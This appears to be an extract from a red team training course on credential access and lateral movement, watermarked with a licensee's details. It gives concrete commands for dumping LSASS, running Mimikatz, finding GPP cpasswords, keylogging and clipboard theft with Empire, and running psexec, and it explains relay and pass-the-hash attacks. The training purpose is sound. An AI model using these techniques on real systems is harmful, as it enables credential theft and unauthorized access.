090aff33bcb6e401ded410120bc9a268 •

Base64 encoding U0VDNTk5IFJPQ0tTIQ== false Local Administrator Administrator Administrators Administrator

26 ,2 02 0

Unattended installs are used for wide-scale deployments If Windows administrators fail to properly clean up after this process, an XML file called “Unattend.xml” is left on the local system



[email protected] Ap ril

Typical locations of unattend.xml files:



o.

co

m

>

– C:\sysprep\ – C:\Windows\Panther\ – C:\Windows\System32\

SEC564 | Red Team Exercises and Adversary Emulation

77

ak

er

@ ya

ho

22829180 i< an

nm

Unattended Install Files Unattended installs are often used in enterprise organizations where it would be too time-consuming to perform wide-scale deployments manually. If Windows administrators fail to properly clean up after this process, an XML file called “Unattend.xml” is left on the local system. An example of such a file is included on the slide.

ze

Lincoln Mazzei ln

C:\sysprep\sysprep.xml C:\unattended.xml C:\Windows\Panther\ C:\Windows\Panther\Unattend\ C:\Windows\System32 C:\Windows\System32\sysprep\

nc o

• • • • • •

M

az

As you can see, it includes the password in a base64 encoded format, which means it can be very easily decoded. These xml files can be found anywhere but generally in:

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

Reference: Credentials in Files: https://attack.mitre.org/techniques/T1081

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

77

© SANS Institute 2020 ATT&CK T1056

Input Capture

TM

090aff33bcb6e401ded410120bc9a268 Keylogging is the most used type of input capture 26 ,2 02 0

• Intercept keystrokes – Hardware – Software

[email protected] Ap ril

• Requires patience and time – Will not be perfect

o.

co

m

>

• Injected login pages are a form of Input Capture

SEC564 | Red Team Exercises and Adversary Emulation

78

ak

er

@ ya

ho

22829180 i< an

nm

Input Capture Capturing end user input is a method for credential access as well as collection. It is common to see such functionality on most adversary malware. Red Team can perform input capture through a variety of methods and tools; most common is keylogging. Keyloggers may be physical hardware or software. On the slide is a picture of a physical keylogger. In Windows, it is most common to see tools and malware leveraging the following API calls to capture keystrokes: SetWindowsHook, GetKeyState, and GetAsyncKeyState. Note that keylogging requires patience and time to capture keys and read through them for useful information such as credentials.

M

az

ze

Lincoln Mazzei nc o

ln

The screenshot above shows the result of keylogging on Empire. To enable keylogging within Empire, ensure you are interacting with an agent: interact . Then usemodule collection/keylogger Running the info command will give you more information. Start they keylogger by running the run command. The keys pressed, time, and the active window, will be saved in Empire/downloads//keystrokes.txt. When a module runs continuously in the background, a started job ID will be returned. If you type jobs in an agent menu, the currently active background jobs will be returned. To kill a job, use jobs kill JOB_ID.

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

References: Input Capture: https://attack.mitre.org/techniques/T1056 http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf

live

78

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1142

Password Managers

TM

Built in: Keeper (Windows), Keychain (Apple) Third Party: KeePass, 1Password, LastPass Steal the file and key log end user Clipboard Theft KeeFarce KeeThief

m

>

Ap ril

[email protected] o.

co

• • • • • •

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Many end users have turned to password managers

SEC564 | Red Team Exercises and Adversary Emulation

79

ak

er

@ ya

ho

22829180 i< an

nm

Password Managers End users, becoming more aware of credential theft and the need to have different passwords for different sites, have begun using personal password managers. Windows 10 brought Keeper built into some versions (Google’s Project Zero Travis Ormandy disclosed a vulnerability on it) while Apple products bring the Keychain. Multiple third-party solutions exist such as KeePass, 1Password, LastPass, etc. There are different methods to steal these passwords. One that was covered already is taking the file and keylogging the user when they input the password to their password manager. Another option if the end users copy and paste from the password manager, monitor the clipboard to steal those passwords when they are copied and pasted.

ln

M

az

ze

Lincoln Mazzei nc o

To enable clipboard monitoring within Empire, ensure you are interacting with an agent: interact Then usemodule collection/clipboard_monitor. Running the info command will give you more information. Start the clipboard monitor by running the run command. When a module runs continuously in the background, a started job ID will be returned. If you type jobs in an agent menu, the currently active background jobs will be returned. To kill a job, use jobs kill JOB_ID.

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

KeePass is a common password manager with two public tools created to extract passwords: KeeFarce and KeeThief. KeeFarce, written by Dol Denandz, allows for the extraction of KeePass 2.x password database information from memory. The cleartext information, including usernames, passwords, notes and URLs are dumped into a CSV file in %AppData%. KeeThief is a PowerShell tool released by Lee Christensen and Will Schroeder that extracts KeePass 2.x key material from memory.

live

References: Keychain: https://attack.mitre.org/techniques/T1142 Keeper vulnerability: https://bugs.chromium.org/p/project-zero/issues/detail?id=1481&desc=3 KeeFarce: https://github.com/denandz/KeeFarce KeeThief: https://github.com/HarmJ0y/KeeThief

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

79

© SANS Institute 2020 Enterprise Password Vaults

090aff33bcb6e401ded410120bc9a268 Being deployed more broadly to improve administrative security 26 ,2 02 0

Popular solutions by CyberArk or Thycotic SecretServer Provide “Just In Time” (JIT) controls for secondary accounts End users log in to web portal with Multi-Factor Select account credentials needed (logged and approved) Service account changes password and provides to user End user uses password for time needed and then it is changed Often deployed in the domain it is trying to protect

co

m

>

Ap ril

[email protected] o.

• • • • • • •

SEC564 | Red Team Exercises and Adversary Emulation

80

ak

er

@ ya

ho

22829180 i< an

nm

Enterprise Password Vaults Password vaults or managers are used at the enterprise level as well. They promise to accomplish a best practice known as “Just In Time” (JIT) access. The theory is the solution has strong authentication and authorization model to login and request a secondary account over multi-factor authentication. The end user requests a secondary account and system they require access to. If authorized, it is logged; if not, it can seek approval. Once approved, the password manager changes the password for the respective account on the respective system and provides the password to the end user. The end user uses the new credentials for the time requested and then the account is disabled again, or password is changed.

ln

M

az

ze

Lincoln Mazzei nc o

While these are great moves forward in securing secondary accounts, the implementations generally have flaws that the Red Team can leverage. An example often seen is these Enterprise Password Vaults are often part of the same domain as the domain they are trying to protect. Leveraging Active Directory lateral movement may allow access to the underlying system. Clipboard theft may work as well.

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

80

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1003

Credential Dumping

TM

090aff33bcb6e401ded410120bc9a268 Process of obtaining account login and password information • Windows

26 ,2 02 0

• Active Directory

– SAM Database – LSA Secrets (Registry) – Cached Credentials – Memory Process Dump

– NTDS – DCSync – Group Policy Preferences – Service Principal Names

Ap ril

[email protected]

• Linux

>

NOTE

m

– /etc/shadow – /proc filesystem

o.

co

SYSTEM or Root privileges are required for most of these procedures to successfully dump credentials SEC564 | Red Team Exercises and Adversary Emulation

81

ak

er

@ ya

ho

22829180 i< an

nm

Credential Dumping Credential dumping is the technique of obtaining account login and cleartext password or password representation (hashes) from various systems. Hashes can be cracked offline to reveal the cleartext password. Cracking times depend on password length, hashing algorithm, and cracking system performance. In Windows, hashes can be used to Pass-the-Hash to other systems.

az

ze

Lincoln Mazzei



nc o

ln

M

Windows The Windows operating system has, by far, the most procedures to dump credentials from file, registry, and memory: SAM Database: Local user LM and NT Hashes can be extracted from the SAM database on the local hard drive for cracking with tools such as pwdump, gsecdump, Creddump or Mimikatz. LSA Secrets and SAM Hashes via Registry: The SAM database may be extracted from the registry as well as LSA Secrets with tools such as pwdump, gsecdump, Creddump or Mimikatz. Cached credential (mscache/mscash hashes): This is a Windows feature that allows domain users to log in to the local system if the domain controller is not available (remote users) and can be extracted with Cachedump or Mimikatz. Memory: Process memory can be dumped to extract credentials. Lsass.exe is the most popular as it stores credentials for Windows accounts and targeted by Mimikatz. However, other processes may contain credentials as well and can be dumped with tools like Procdump: procdump -ma lsass.exe lsass_dump

Li



ce

ns



ed



To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

Active Directory Domain Controllers store the domain user hashes in NTDS.dit. Domain Admin level credentials are required to obtain the file leveraging Volume Shadow Copy (VSSAdmin). DCSync can be another method to extract hashes by adding a rogue domain controller to the domain. Group Policy Preferences may contain passwords in encrypted format. Service Principal Names can be used for SPN scanning and a technique called Kerberoasting, which we will cover shortly.

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

81

© SANS Institute 2020 *nix /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in cleartext or password hashes in memory, these values can then be harvested. MimiPenguin is a tool that allows for this extraction.

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

References: Credential Dumping: https://attack.mitre.org/techniques/T1003/ Mimipenguin: https://github.com/huntergregal/mimipenguin

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

82

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK S0002

Memory

TM

090aff33bcb6e401ded410120bc9a268 • Cleartext credentials in LSASS when login is interactive:

26 ,2 02 0

– Log on to workstation – RunAs on workstation and run standard Microsoft MMC admin tools (“Active Directory Users & Computers”) – RDP to any system

Ap ril

[email protected] >

• Mimikatz by Benjamin Delphy

o.

co

m

– Extracts plaintext credentials – Hashes from local SAM or NTDS.dit – Kerberos tickets

SEC564 | Red Team Exercises and Adversary Emulation

83

ak

er

@ ya

ho

22829180 i< an

nm

Memory Windows is notorious for storing credentials in memory, more-so than any other operating system. This is a design flaw from implementing Single Sign On at the operating system level. While presenting credentials once at login is convenient, Windows stores the credentials and hashes to login to any other Windows service seamlessly when requested (SharePoint, File Shares, NTLM via HTTP, etc). The slides provides a number of scenarios where the clear text credentials may be saved in lsass.exe for extraction (interactive logon).

az

ze

Lincoln Mazzei nc o

ln

M

Mimikatz Written by Benjamin Delphy, Mimikatz is a credential dumping tool for obtaining plaintext Windows credentials, hashes, and Kerberos tickets or as he eloquently states it “is a tool I've made to learn C and make somes experiments with Windows security.” Mimikatz can be executed from a number of tools, including Empire, PowerShell, standalone executable, and memory forensic tools (Volatility). Note that many blue team tools attempt to catch Mimikatz. Some useful commands once Mimikatz is running:

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

ed

mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords mimikatz # sekurlsa::tickets /export mimikatz # vault::cred mimikatz # vault::list mimikatz # token::elevate mimikatz # lsadump::sam mimikatz # lsadump::secrets mimikatz # lsadump::cache

Li

• • • • • • • • •

live

References: Mimikatz: https://github.com/gentilkiwi/mimikatz Mimikatz Wiki: https://github.com/gentilkiwi/mimikatz/wiki

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

83

© SANS Institute 2020 Active Directory

090aff33bcb6e401ded410120bc9a268 Domain Admin is not a destination 26 ,2 02 0

• Group Policy Preferences – Crawl SYSVOL for any group policy with decryptable passwords – Get-GPPPassword by Chris Campbell

[email protected] o.

co

m

>

Ap ril

• NTDS.dit – all AD account hashes • DCSync – become a Domain Controller

SEC564 | Red Team Exercises and Adversary Emulation

84

ak

er

@ ya

ho

22829180 i< an

nm

Active Directory Red Team will encounter Active Directory in most target organizations. While it is nice to obtain Domain Admin on a Domain Controller, note that it is not the destination (and generally never the objective of an adversary). Active Directory is another attack surface to leverage for the Red Team to reach the objective.

ze

Lincoln Mazzei nc o

ln

M

az

Group Policy Preferences (GPP) GPPs are used to allow administrators to create domain policies (sometimes with embedded credentials). These policies allowed administrators to change local accounts or embed credentials for the purposes of mapping drives. While highly useful, the storage mechanism used for such credentials is insecure: The GPP’s are stored in XML files on the SYSVOL share (Windows domain share accessible to all domain users) and the password is stored encrypted with a known 32-byte AES key. Microsoft addressed in MS14-025 but existing GPPs with passwords were not removed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

The following command can find these files from any domain-authenticated user session findstr /S cpassword %LOGONSERVER%\sysvol\*.xml. This one-line command will search for the string “cpassword” in any .xml file under the domain controller’s publicly accessible sysvol network share. Alternatively, Get-GPPPasword, by Chris Campbell, can do the same thing. The screenshot on the slide shows an identified XML file with a cpassword value when opened using a normal text editor. Note the value for the “cpassword”. References: Microsoft MSDN article with AES Key: https://msdn.microsoft.com/en-us/library/cc422924.aspx Get-GPPPassword: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/GetGPPPassword.ps1

live

84

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1208

Kerberoasting

TM

090aff33bcb6e401ded410120bc9a268 • •

Discovered by Tim Medin of Red Siege Any domain user can request a service ticket

[email protected]

No need to interact with the service Service does not need to exist, just account

co

GetUserSPNs.py from Impacket can grab the tickets Hashes are crackable via Hashcat

o.

• •

m

>

– Effective for old, defunct service accounts – Many old service accounts have passwords that never expire

Ap ril

• •

26 ,2 02 0

– A portion of the ticket is encrypted using the service’s password hash – Account to service mapping information can be obtained by requesting a list of Service Principle Names (SPN) from Active Directory – Mimikatz, Empire, and other tools can be used to extract the requested tickets

SEC564 | Red Team Exercises and Adversary Emulation

85

ak

er

@ ya

ho

22829180 i< an

nm

Kerberoasting Discovered by Tim Medin from Red Siege and first presented at SANS HackFest. Kerberoasting leverages a flaw in Service Principal Names to obtain credentials from Active Directory service accounts. Service Principal Names (SPNs) are used to identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account. Any domain user can request a service ticket from the domain controller. Portions of the ticket are encrypted with RC4, including the credentials, and therefore can be cracked offline.

M

az

ze

Lincoln Mazzei nc o

ln

References: Tim Medin presentation: https://www.youtube.com/watch?v=HHJWfG9b0-E Kerberoasting: https://attack.mitre.org/techniques/T1208 Impacket: https://github.com/CoreSecurity/impacket

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

85

© SANS Institute 2020 ATT&CK T1040

Network Sniffing

TM

• Tactic of Discovery and Credential Access • Requires higher privilege but has built-in tools

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Set network interface to promiscuous mode to capture packets – C:\ netsh trace start – PS C:\> Start-NetEventSession -Name Session1

Ap ril

[email protected] Reveals what systems are talking to each other o.

co

m

>

• • May reveal clear text passwords for weak protocols (FTP, Telnet, HTTP) • Common third-party tools can do this too: tcpdump, wireshark SEC564 | Red Team Exercises and Adversary Emulation

86

ak

er

@ ya

ho

22829180 i< an

nm

Network Sniffing Network Sniffing is a tactic for discovery and credential access. With high privilege on a target system, Red Team can enable promiscuous mode on the network interface and monitor or capture network traffic. Observing the traffic will provide information related to what systems are talking to each other. If the target network leverages insecure, cleartext protocols, credentials may be seen. Common protocols used on internal networks that are not encrypted include but are not limited to HTTP, Telnet, and FTP.

az

ze

Lincoln Mazzei

• • • • • •

nc o

ln

M

While there are many common network sniffing tools such as tcpdump and wireshark, Windows has built-in functionality such as this network sniffing procedure with PowerShell: New-NetEventSession - Add a new network event session New-NetEventProvider - Add a network event provider to the session Start-NetEventSession - Start the session Get-NetEventSession - Get information about the session Stop-NetEventSession - Stop the network event session Remove-NetEventSession - Remove the network event session

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

References: Network Sniffing: https://attack.mitre.org/techniques/T1040 Netsh packet trace: https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-withoutinstalling-anything-capture-a-network-trace-of-a-reboot/ PowerShell Packet capture: https://blogs.technet.microsoft.com/netgeeks/2017/04/27/basic-ps-script-to-perform-anetwork-capture-packet-sniffing/

live

86

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Password Cracking

090aff33bcb6e401ded410120bc9a268 Steal password hashes and crack them offline 26 ,2 02 0

• Steal encrypted/hashed passwords and guess/encrypt/compare on Red Team system – Does not lock out accounts

[email protected] Ap ril

• Many orders of magnitude faster than password guessing • Many tools available:

o.

co

m

>

– John the Ripper – Hashcat – NPK

SEC564 | Red Team Exercises and Adversary Emulation

87

ak

er

@ ya

ho

22829180 i< an

nm

Password Cracking It is very common for Red Teamers to obtain password representations and attempt to crack them. Unlike encryption, hashing isn’t reversible. The only way to “recover” the password from the hash is to take a guess as to what the password is, run it through the hashing algorithm, and see if the result matches the hash you have. This is a time-consuming challenge and the tooling available to attackers is very mature: John the Ripper and Hashcat support a huge number of hash types with all sorts of features and exceptional performance optimizations. The challenge at the end of the day is hardware as for each guess, the hardware has to leverage machine resources, whether CPU or GPU to compare the hash of the guess with the hash of the password.

nc o

References: https://www.openwall.com/john/ https://hashcat.net/hashcat/

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

87

© SANS Institute 2020 NPK

090aff33bcb6e401ded410120bc9a268 • Distributed Cracking 26 ,2 02 0

Serverless on AWS Easy install Price estimate Max price enforcement Multi-user Cost effective vs. password cracking rig

co

m

>

Ap ril

[email protected] o.

• • • • • •

SEC564 | Red Team Exercises and Adversary Emulation

88

ak

er

@ ya

ho

22829180 i< an

nm

NPK NPK, created by Coalfire Research, is a distributed hash-cracking platform built entirely of serverless components in AWS including Cognito, DynamoDB, and S3. It was designed for easy deployment and the intuitive UI brings high-power hash-cracking to everyone. 'NPK' is an initialism for the three primary atomic elements in fertilizer (Nitrogen, Phosphorus, and Potassium). Add it to your hashes to increase your cred yield! NPK lets you leverage extremely powerful hash cracking with the 'pay-as-you-go' benefits of AWS. For example, you can crank out as much as 1.2TH/s of NTLM for a mere $14.70/hr. NPK was also designed to fit easily within the free tier while you're not using it! Without the free tier, it'll still cost less than 25 CENTS per MONTH to have online!

ln

M

az

ze

Lincoln Mazzei nc o

References: https://www.coalfire.com/The-Coalfire-Blog/March-2019/High-Power-Hash-Cracking-with-NPK https://github.com/Coalfire-Research/npk

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

88

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1075

Pass the Hash

TM

090aff33bcb6e401ded410120bc9a268 • In Windows, use the hash directly (Pass-the-Hash) 26 ,2 02 0

• Time-consuming password cracking is not required • You must get hashes in the first place to perform the attack – Inject them into lsass – Use any Windows file and print sharing client tool

[email protected] Ap ril

• To try to mitigate Pass-the-Hash attacks, Microsoft released an optional patch in May 2014 as Security Advisory 2871997

m

>

– Still works for local administrator account (RID 500 account)

o.

co

• Many tools: Windows Credential Editor, Metasploit, Empire SEC564 | Red Team Exercises and Adversary Emulation

89

ak

er

@ ya

ho

22829180 i< an

nm

Pass the Hash Instead of cracking a password, the hash can be provided to other Windows systems to log in:

Lincoln Mazzei nc o

ln

M

az

ze

1. The attacker steals password hashes from the target environment. 2. Instead of cracking those passwords, the attacker strips off the hash for a given user (likely one in the administrator's group) and carefully places it in the memory of the Local Security Authority Subsystem Service (LSASS) of an attacker-controlled machine with a tool like Windows Credentials Editor. 3. Lastly, simply use any Windows file and print sharing client tools to access the target system, with Windows automatically presenting the user's credentials to the target, thereby bypassing any need for providing an actual password. The password hash, as well as a tool that puts it into memory, are all that is needed.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Li

Hernán Ochoa distributes a free Windows-based pass-the-hash attack tool called the Windows Credentials Editor, or WCE for short. This tool injects credentials into memory so that any Windows tool that uses pass-through authentication (such as net use, reg, sc, and non-built-in tools such as Sysinternals psexec) passes the credentials of the WCE user. In addition to grabbing and injecting LANMAN and NT hashes, recent versions of the WCE tool can also inject Kerberos tickets into memory so that an attacker can use them to authenticate to a target in a pass-theticket attack, directly analogous to a pass-the-hash attack. The command-line options for achieving these operations are -l to list hashes available to the current session, -s to inject the hashes so that they can be used, -d to remove injected hashes, -K (uppercase) to list Microsoft Kerberos tokens, and -k (lowercase) to inject the Kerberos tokens.

live

References: Pass the Hash: https://attack.mitre.org/techniques/T1075/ https://www.ampliasecurity.com/research.html

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

89

© SANS Institute 2020 Course Roadmap

Lateral Movement and Pivoting

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

90

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

90

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK TA0008

Lateral Movement

TM

1.

Red Team obtains initial access to an internal system (endpoint) through phishing

2.

Red Team performs discovery; escalates privileges and captures credentials from local system

3.

Credentials are reused against other internal assets

4.

Repeat

5.

Objectives are reached

DMZ

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 [email protected] Internal Segment

o.

co

m

>

Ap ril

Core Assets

SEC564 | Red Team Exercises and Adversary Emulation

91

ak

er

@ ya

ho

22829180

Lincoln Mazzei ln

M

az

ze

Red Team obtains access to Workstation through phishing Red Team performs discovery; escalates privileges and captures credentials from local system Credentials are reused against other internal assets Repeat Objectives are reached

nc o

1. 2. 3. 4. 5.

i< an

nm

Lateral Movement After Initial Access, adversaries attempt to gain access to other endpoints on the same network or pivot onto other network segments; this is called lateral movement. In a simplistic view of lateral movement:

References: Lateral Movement: https://attack.mitre.org/tactics/TA0008/ Illustration by Erik Van Buggenhout and is part of SANS SEC599: Defeating Advanced Adversaries - Purple Team Tactics & Kill Chain Defenses: https://www.sans.org/course/defeating-advanced-adversaries-kill-chain-defenses

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

91

© SANS Institute 2020 Network Protocols

090aff33bcb6e401ded410120bc9a268 Blend in by using the same internal protocols the target uses • SMB (TCP/445)

RDP (TCP/3389) SSH (TCP/22) VNC/TeamViewer? WinRM (TCP/5985-6)

– PsExec – schtasks – sc – WMIC (135 and high ports)

26 ,2 02 0

• • • •

Ap ril

[email protected] o.

co

m

>

– PowerShell

SEC564 | Red Team Exercises and Adversary Emulation

92

ak

er

@ ya

ho

22829180 i< an

nm

Network Protocols To perform lateral movement, network protocols should be evaluated and leveraged. It is a best practice to blend in by leveraging network protocols actively used by the target environment. This information can be obtained with internal discovery, recon, and/or situational awareness.

ze

Lincoln Mazzei az

Once a network protocol has been chosen, leverage a tool that uses that protocol to move laterally.

nc o

ln

M

Server Message Block (or SMB) is generally used within Windows environments. Many tools leverage this protocol for communication including psexec, schtasks, sc, and WMIC (to establish connection and then move to high ports).

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

ed

RDP (TCP/3389): Windows has built-in mstsc.exe SSH (TCP/22): Most Linux systems have SSH server daemon and client VNC/TeamViewer: A TTP used quiet frequently and allowed in certain environments WinRM (TCP/5985-6): Used for remote PowerShell

Li

• • • •

To :

Li

Other options for internal lateral movement are:

live

92

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 PsExec

090aff33bcb6e401ded410120bc9a268 • Requires local admin credentials/access on target system – Supply credentials or use the ones of current user (pass-the-hash friendly)

26 ,2 02 0

• Authenticates via SMB protocol (common in most environments) • Creates a service on the target system and can run as SYSTEM • Comes with many tools

[email protected] o.

co

m

>

Ap ril

– Sysinternals NOTE – Nmap You may have to go back and delete the – Metasploit service created – Empire C:\> psexec \\[targetIP] [-d] [-u user] [–p password] [command] SEC564 | Red Team Exercises and Adversary Emulation

93

ak

er

@ ya

ho

22829180 i< an

nm

PsExec Psexec is free from Microsoft Sysinternals and included in various tools such as Nmap, Metasploit, and Empire. Although it is not built into Windows, it is leveraged by many system administrators as it is incredibly flexible and convenient, representing one of the easiest ways to make a remote Windows machine run a command. That command can run with the privileges of an individual administrative user specified with the psexec invocation (as long as a password is provided for that user) or with local SYSTEM privileges.

M

az

ze

Lincoln Mazzei nc o

ln

The syntax for using psexec to run a command on a target machine is: C:\> psexec \\[targetIP] [-d] [-u user] [–p password] [command] If the –u and –p options are omitted, psexec uses the current user's credentials to access the target machine. With the –s flag, the command runs with local SYSTEM privileges on the target. The –d means run detached. Another nice feature of psexec is that the command (that is, an executable the tester wants to run) doesn't have to be preloaded on the machine. Generally, an attacker must first load the command to the target's file system before making the remote machine run it, unless the command is already there. With psexec, no such preloading of the command is required. The tester can launch psexec with the –c option to make psexec put a copy of the command on the target machine before psexec then runs the command.

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK It is important to note that the psexec command makes an important change on a target machine the first time it is run against that target, which it does not clean up after it is finished. In particular, using psexec against a target causes the psexec service to be created on that target machine. You may want to go back and manually remove the psexec service using the sc command after you finish running a command on the host. Otherwise, you will leave behind a service in the target environment.

live

Reference: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

93

© SANS Institute 2020 ATT&CK T1187

SMB Relay

TM

090aff33bcb6e401ded410120bc9a268 • Wait for an SMB Authentication request to the workstations – Vulnerability Scanners, Management tools, NAC Solutions

26 ,2 02 0

• Relay it through to the target system • SMB Signing must not be enabled

[email protected] 1. Request authentication

Ap ril

2. Request authentication

4. Challenge

3. Challenge

5. Response

m

>

6. Response

Attacker Workstation

o.

Victim Workstation

7. Authentication granted

co

8. Authentication failed

SEC564 | Red Team Exercises and Adversary Emulation

94

ak

er

@ ya

ho

22829180

Target Win Server

i< an

nm

SMB Relay SMB relaying is an attack where the adversary relays attempted NTLMv2 authentication against his machine to another system, in order to obtain unauthorized access to this machine. Typical use cases include automated vulnerability scanners, scripts created by administrators… So, how does it actually work?

ze

Lincoln Mazzei nc o

ln

M

az

1. As a first step, the attacker needs to lure a victim to attempt authentication against a compromised system running the relay. 2. The received authentication request is forwarded by the attacker to the actual target (e.g. a Windows server). 3. The Windows server (target) responds to the attacker with an authentication challenge. 4. The evil attacker forwards the authentication challenge to the victim. 5. The victim calculates a response using his / her credentials, which is sent to the attacker. 6. The attacker forwards the response to the Windows server. 7. If authorized, the target Windows server grants authentication to the attacker. 8. In order to “close the loop” the attacker forwards an “authentication failure” message to the victim.

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

For simplicity reasons, we’ve emitted a possible “Domain-based” environment in the diagram above (the Windows server does local authentication). In a domain-based environment, the Windows server would forward the challenge and response to a domain controller. References: Forced Authentication: https://attack.mitre.org/techniques/T1187 https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch2018-edition-82259ab73aaa Illustration created by Erik Van Buggenhout and is part of SANS SEC599: Defeating Advanced Adversaries Purple Team Tactics & Kill Chain Defenses: https://www.sans.org/course/defeating-advanced-adversaries-killchain-defenses

live

94

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1171

LLMNR/NBT-NS Poisoning and Relay

TM

090aff33bcb6e401ded410120bc9a268 • End user misspells a hostname 26 ,2 02 0

• DNS Server does not know the answer • System asks others around if they know the IP of the host 1.NBT-NS or LLMNR

Ap ril

[email protected] 2. Resolution response

3. Request authentication

>

4. Request authentication

7. Response

Attacker Workstation

10. Authentication failed

5. Challenge

8. Response

o.

Victim Workstation

co

m

6. Challenge

9. Authentication granted

SEC564 | Red Team Exercises and Adversary Emulation

95

ak

er

@ ya

ho

22829180

Target Win Server

i< an

nm

LLMNR/NBT-NS Poisoning and Relay Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods for hostname resolution. When a user misspells a hostname and the DNS Server does not know the answer, the system asks others around if they know the IP of the host. Consider the following attack flow:

az

ze

Lincoln Mazzei nc o

ln

M

1. The victim workstation attempts to resolve a domain name through NBT-NS or LLMNR, because the requested domain name doesn’t have a DNS entry (e.g. because end user made a typo: “FILESEERVER” instead of “FILESERVER). 2. The attacker uses Responder to respond to the multicast resolution request. 3. The victim attempts to authenticate toward the attacker. 4. The received authentication request is forwarded by the attacker to the actual target (e.g. a Windows server). 5. The Windows server (target) responds to the attacker with an authentication challenge. 6. The evil attacker forwards the authentication challenge to the victim. 7. The victim calculates a response using his/her credentials, which is sent to the attacker. 8. The attacker forwards the response to the Windows server. 9. If authorized, the target Windows server grants authentication to the attacker. 10. In order to “close the loop” the attacker forwards an “authentication failure” message to the victim.

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

